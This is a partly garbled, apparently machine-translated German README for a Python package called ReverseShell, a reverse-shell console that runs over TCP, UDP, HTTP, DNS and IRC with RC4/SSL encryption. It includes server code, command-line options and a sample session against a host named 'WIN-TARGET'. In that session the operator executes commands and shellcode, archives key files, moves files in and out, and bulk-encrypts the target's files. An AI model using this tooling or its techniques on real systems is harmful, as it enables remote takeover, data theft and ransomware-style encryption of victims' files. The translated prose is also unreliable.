Dieses Paket implementiert eine erweiterte Reverse -Shell -Konsole (Unterstützung: TCP, UDP, IRC, HTTP und DNS).
Beep , Socket -Zeitüberschreitungen , Sleep , Kinderprozess, asynchronisiertem Arbeiter oder Threadende , print )Sie können Multiples POC für Reverse -Shell -Client im Python im Client -Verzeichnis lesen.
Ich füge den öffentlichen und privaten Schlüssel für das Standard -SSL -Zertifikat hinzu, ist für den Test nützlich, aber nicht sicher, erstelle ein eigenes Zertifikat, um deine TCP -Daten zu schützen .
Dieses Paket erfordert:
pip install ReverseShellpython3 -m ReverseShell --help
python3 ReverseShell.pyz -h
ReverseShell # To test this command use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.
ReverseShell -u -d # To test this command use the shellclientdns.py script. This is a DNS (UDP) reverse shell.
ReverseShell -H -T # To test this command use the shellclienthttp_advanced.py script. This is an advanced HTTP reverse shell.
ReverseShell -H -T -s # To test this command use the shellclienthttps_advanced.py script. This is an advanced HTTPS reverse shell.
ReverseShell -H -T -s -k " abcd " # To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell.
ReverseShell -I # To test this command use the shellclientsocketirc.py script. This is an IRC reverse shell.
ReverseShell -T # To test this command use the shellclienttcp.py script. This is a multi-sessions TCP reverse shell.
ReverseShell -T # To test this command use the shellclienttcp_advanced.py script. This is an advanced multi-sessions TCP reverse shell.
ReverseShell -u # To test this command use the shellclientudp.py script. This is a UDP reverse shell. from ReverseShell import ReverseShellSocketTcp , ReverseShell
with ReverseShellSocketTcp ( address = ( "127.0.0.1" , 1337 ), ssl = False , cert = None , key = None , handler = ReverseShell ) as shellserver :
shellserver . serve_forever ()
# To test this code you can use the shellclientsockettcp.py script. This is a standard/basic reverse shell compatible with netcat.
from ReverseShell import ReverseShellTcp , HttpReverseShell , partial
with ReverseShellTcp ( address = ( "127.0.0.1" , 1337 ), ssl = True , cert = "server.crt" , key = "server.key" , handler = partial ( HttpReverseShell , key = b"abcd" , encoding = "utf-8" )) as shellserver :
shellserver . serve_forever ()
# To test this command use the "shellclienthttpsencrypt_advanced.py abcd" command. This is an advanced HTTPS encrypted (using RC4 with "abcd" key) reverse shell. WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ call_library_function kernel32.dll WinExec "char *:calc.exe" "long:1"
Return value: 33
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ archive_files test.zip *.md *.key
Making archive...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ download_url http://google.com test.html
Done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocumentsReverseShell$ cd ..
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ update_environment
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ upload_file shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ download_file shellcode2.py
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ python3_exec print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ upload_file_compress shellcode.py shellcode2.py
['shellcode.py', 'shellcode2.py']
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ download_file_compress shellcode2.py
done
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ python3_exec_compress print('qwerty')
qwerty
None
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ shellcode SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ shellcode_compress SDHJSIHp3f///0iNBe////9Iu9MZW06IcMOdSDFYJ0gt+P///+L0L1HYqniYA53TGRofySCRzIVRapztOEjPs1HQHJA4SM/zUdA82DjMKplTFn9BOPJdfyU6Mopc49wS0FYPibEhcIFYCgYDIuMWkSUTT1j7QxXTGVsGDbC3+psYix4DONvZWFl7B4mgIMub5pIPA0RL1dLPFn9BOPJdf1iah4Uxwlzr+S6/xHOPudtcYp/9qJvZWFl/B4mgpdxYFRMKAzDf1NLJGsWM+IucA1gDD9AumseSQRoXySqLHj85Ghx3kJvcikMTxZqZlGIs5gYGMnHDndMZW06IOE4Q0hhbTsnK8ha8nqSbM5Det9lY4egdzV5iBlHYiqBMxeHZmaCu/XV42sBrNCSIKYIUCeaOLekcoLO2YT5OiHDDnQ==
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_file test.html
[!] Invalid command detected for 'encrypt_files' command. Minimum 2 arguments are required.
[*] USAGE: encrypt_files [key] [filename1] [filename2] ... [filenameX]
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_file qwerty test.html
Encryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ decrypt_file qwerty test.html
Decryption is running...
[*] 1 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ encrypt_files qwerty *.html *.zip
Encryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$ decrypt_files qwerty *.html *.zip
Decryption is running...
[*] 2 childs process are running...
WIN-TARGET@USER-TARGET:C:UsersUSER-TARGETDocuments$
Sie können einen Beitrag leisten! Anfänger-, Zwischen- und Fortgeschrittene -Entwickler können zu diesem Repository beitragen. Python -Entwickler, Systemadministratoren, Netzwerkadministratoren, Webentwickler und kompilierte Sprachentwickler können einen Beitrag leisten. Sehen Sie sich die Probleme an, um zu wissen, was wir brauchen.
usage: ReverseShell.py [-h] [--udp | --tcp | --multi-tcp] [--http | --dns | --irc] [--no-color] [--key KEY] [--cert CERT] [--private PRIVATE] [--ip IP]
[--port PORT] [--encoding ENCODING] [--ssl] [--no-timeout]
Advanced reverse shell console.
options:
-h, --help show this help message and exit
--udp, -u Use UDP socket.
--tcp, -t Use TCP socket.
--multi-tcp, -T Create TCP socket for each command and responses.
--http, -H Use HTTP requests and responses.
--dns, -d Use DNS requests and responses.
--irc, -I Use IRC requests and response.
--no-color, --color, -C
Do not use color
--key KEY, -k KEY Add a key to encrypt with RC4.
--cert CERT, -c CERT SSL cert file.
--private PRIVATE, -P PRIVATE
SSL private key file.
--ip IP, -i IP IP address to start the ReverseShell server.
--port PORT, -p PORT UDP/TCP port to start the ReverseShell server.
--encoding ENCODING, -e ENCODING
The reverse shell encoding used by client.
--ssl, -s Use SSL over TCP socket.
--no-timeout, -m Faster response but TCP data larger than Window maximum size will not work. You should use this argument with standard/basic
reverse shell like netcat.
Lizenziert unter der GPL, Version 3.